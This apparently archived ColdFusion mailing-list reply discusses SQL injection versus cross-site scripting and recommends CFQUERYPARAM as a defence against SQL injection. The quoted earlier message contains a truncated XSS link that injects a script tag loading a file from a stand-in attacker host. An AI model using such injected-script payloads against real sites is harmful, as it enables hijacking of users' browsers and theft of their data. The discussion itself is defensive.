> More evil is stuff like: > > <A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT > SRC='http://evil.org/badkama.js' ...
I don't know what you mean by "more evil", but generally speaking SQL injection attacks are considered to be a more serious problem than cross-site scripting attacks. Fortunately, though, it's quite easy to prevent them entirely - it's not so easy to prevent cross-site scripting attacks. > I've always hated cfqueryparaming everything, or generally > hand-coding any database CRUD. You don't need to "hand-code database CRUD" to use CFQUERYPARAM. There's really no excuse for not using it. Even the Dreamweaver 8 code-generation wizards generate CFQUERYPARAM tags. > A link for stuff cfqueryparam might not catch (with examples): > http://www.technicalinfo.net/papers/CSS.html No, CFQUERYPARAM won't catch cross-site scripting exploits. It's not intended to do that. It does, however, guarantee prevention of SQL injection exploits. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Introducing the Fusion Authority Quarterly Update. 80 pages of hard-hitting, up-to-date ColdFusion information by your peers, delivered to your door four times a year. http://www.fusionauthority.com/quarterly Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:250993 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
